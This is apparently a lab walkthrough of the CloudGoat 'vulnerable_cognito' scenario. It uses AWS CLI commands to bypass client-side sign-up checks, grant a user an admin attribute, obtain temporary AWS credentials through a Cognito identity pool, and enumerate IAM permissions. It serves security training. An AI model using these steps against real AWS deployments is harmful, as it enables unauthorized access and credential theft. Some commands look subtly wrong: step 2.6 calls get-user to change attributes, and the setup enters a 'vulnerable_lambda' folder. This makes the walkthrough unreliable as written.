CloudGoat: Vulnerable_Cognito
Note:
- We will be performing our attack via Kali Linux
- Ensure you have done the pre-requisites before you start the lab
1. Preparation
1.1 Launch the scenario:
┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_cognito
1.2: read the start.txt file
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_lambda*
┌──(root㉿kali)-[/opt/cloudgoat/xxx]
└─# cat start.txt
apigateway_url = https://xxxyyy/index.html
... ... ...
2. Enumeration
2.1 open the URL in browser
- we found a sign up option
- tried to sign up with my personal gmail account, but received error
- view the page source of this page, at line 43 and 44 we found useful information
2.2: use AWS CLI to “sign up” and “confirm” my email manually to bypass client-side validation check for the email
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --password P@ssw0rd --user-attributes '[{"Name":"given_name","Value":"lorem"},{"Name":"family_name","Value":"ipsum"}]' --region us-east-1
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp confirm-sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --confirmation-code 287215 --region us-east-1
2.3: login via browser with our signed up credentials
- once logged in, we are redirected to reader.html page
2.4: get the value of access token
- inspect element > storage > local storage > we need to copy the cookie for the xxx.accessToken > save into a file “accessToken.txt”
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat accessToken.txt
access token = eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx
2.5: get the user attributes and metadata for the user
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp get-user --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --region us-east-1
2.6: update the user attribute, so that we can grant ourselves admin permission
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp get-user --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --user-attributes '[{"Name":"custom:access","Value":"admin"}]' --region us-east-1
2.7: get the IdentityPoolId, new access token, and identity id
- we logout, then login, then manually access “admin.html” page
- view page source, we found useful value like IdentityPoolId
- we pull the new access token again
# ***SYNTAX***
# aws cognito-identity get-id --region [region] --identity-pool-id '[IdentityPool_Id]' --logins "cognito-idp.{region}.amazonaws.com/{UserPoolId}={idToken}"
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-id --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"
{
"IdentityId": "us-east-1:9b575e70-f9d7-cd3e-8840-7be3fecf4d37"
}
2.8: collect the credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-credentials-for-identity --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"
{
... ... ...
"Credentials": {
"AccessKeyId": "xxxaaa",
"SecretKey": "xxxbbb",
"SessionToken": "xxxccc",
... ... ...
}
}
2.9: IAM enumeration automatically using the above credentials
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd /opt
┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/andresriancho/enumerate-iam.git
┌──(root㉿kali)-[/opt/enumerate-iam]
└─# cd enumerate-iam
┌──(root㉿kali)-[/opt/enumerate-iam]
└─# ./enumerate-iam.py --region us-east-1 --access-key xxxaaa --secret-key xxxbbb --session-token xxxccc
3. Clean up
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_cognito --help
Destroy "vulnerable_xxx" ? [y/n]: y